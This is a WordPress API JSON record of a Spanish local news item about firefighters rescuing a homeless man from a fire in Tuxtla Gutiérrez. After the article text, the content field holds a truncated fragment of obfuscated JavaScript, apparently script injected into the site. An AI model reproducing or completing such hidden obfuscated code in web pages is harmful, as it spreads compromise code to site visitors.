{"id":1161,"date":"2022-04-08T02:10:47","date_gmt":"2022-04-08T02:10:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1161"},"modified":"2022-04-08T02:10:49","modified_gmt":"2022-04-08T02:10:49","slug":"rescatan-a-indigente-de-incendio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1161","title":{"rendered":"Rescatan a indigente de incendio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"589\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649383003563-1024x589.jpg\" alt=\"\" class=\"wp-image-1163\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649383003563-1024x589.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649383003563-300x173.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649383003563-768x442.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649383003563.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 7 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este jueves se incendi\u00f3 un predio localizado a un costado de la Casa del Migrante en Tuxtla Guti\u00e9rrez, el cual se extendi\u00f3 hasta una casa abandonada donde se encontraba un indigente.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este siniestro se origin\u00f3 cerca del medio d\u00eda y fue reportado a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Bomberos para apagar las llamas y retirar a la persona que habitaba en la casa abandonada.<\/p>\n\n\n\n<p>Finalmente el fuego fue apagado y los cuerpos de auxilio se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este jueves se incendi\u00f3 un predio localizado a un costado de la Casa del Migrante en Tuxtla Guti\u00e9rrez, el cual se extendi\u00f3 hasta una casa abandonada donde se encontraba un indigente. De acuerdo con los reportes oficiales este siniestro se origin\u00f3 cerca del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1163,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1161","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1161","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1161"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1161\/revisions"}],"predecessor-version":[{"id":1164,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1161\/revisions\/1164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1163"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1161"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1161"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1161"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}